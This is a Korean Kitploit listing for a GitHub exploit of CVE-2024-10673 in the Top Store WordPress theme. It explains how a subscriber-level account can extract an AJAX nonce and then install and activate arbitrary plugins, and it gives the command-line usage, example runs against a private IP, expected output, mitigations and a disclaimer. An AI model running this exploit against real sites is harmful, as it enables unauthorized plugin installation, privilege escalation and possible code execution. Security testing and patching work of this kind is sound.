Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-10673 — Top Store <= 1.5.4 - 인증된 (구독자 이상) 임의의 플러그인 설치/활성화 | Kitploit
도구/GitHubGitHub/nxploited/cve-2024-10673
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubnxploited/cve-2024-10673

CVE-2024-10673

Top Store <= 1.5.4 - 인증된 (구독자 이상) 임의의 플러그인 설치/활성화

저장소 보기
111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔥 개요

이 스크립트는 Top Store WordPress 테마(<= 1.5.4) 에서 발견된 치명적인 취약점 CVE-2024-10673을 악용합니다. 이 결함으로 인해 구독자 수준 이상의 인증된 사용자가 보호되지 않은 AJAX 요청을 통해 임의의 플러그인을 설치 및 활성화할 수 있습니다.

⚠️ 심각도 및 영향

  • 인증되지 않은 플러그인 설치: 구독자 권한을 가진 공격자가 관리자 승인 없이 플러그인을 설치할 수 있습니다.
  • 원격 코드 실행(RCE) 가능성: 악성 플러그인이 설치되면 공격자가 임의의 코드를 실행할 수 있습니다.
  • 권한 상승: 공격자가 관리자 액세스 권한을 부여하는 플러그인을 설치할 수 있습니다.

🛠️ 이 익스플로잇의 특징

  • 필수 nonce를 동적으로 추출하여 공격을 자동화합니다.
  • 플러그인 선택 가능 (사용자가 설치 및 활성화할 플러그인을 지정할 수 있음).
  • 구조화된 로깅을 위한 JSON 형식의 응답을 지원합니다.
  • 오류를 적절히 처리하여 강력한 실행을 보장합니다.

⚡ 익스플로잇 작동 방식

  1. 유효한 자격 증명을 사용하여 WordPress에 로그인합니다.
  2. themes.php?page=thunk_started에서 AJAX nonce를 추출합니다.
  3. 플러그인을 설치하는 AJAX 요청을 전송합니다 (기본값: hunk-companion 또는 사용자 정의 플러그인).
  4. 플러그인을 활성화하는 또 다른 요청을 전송합니다.
  5. 성공 또는 실패를 나타내는 JSON 응답을 출력합니다.

🚀 사용법

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

예제

  • 기본 플러그인(hunk-companion) 설치 및 활성화:
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • 특정 플러그인(woocommerce) 설치 및 활성화:
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 예상 출력

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 완화 방안

WordPress 사이트를 보호하려면:

  • Top Store 테마의 패치된 버전으로 업데이트하세요.
  • 구독자 권한을 제한하여 불필요한 액세스를 방지하세요.
  • 설치된 플러그인을 모니터링하여 무단 변경을 확인하세요.
  • 비관리자에게 플러그인 설치를 비활성화하세요.

⚠️ 면책 조항

이 스크립트는 교육 및 보안 연구 목적으로만 제공됩니다. 소유하지 않거나 명시적인 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법입니다. 책임 있게 사용하세요!

작성자: Khaled Alenazi (Nxploit)

도구 다운로드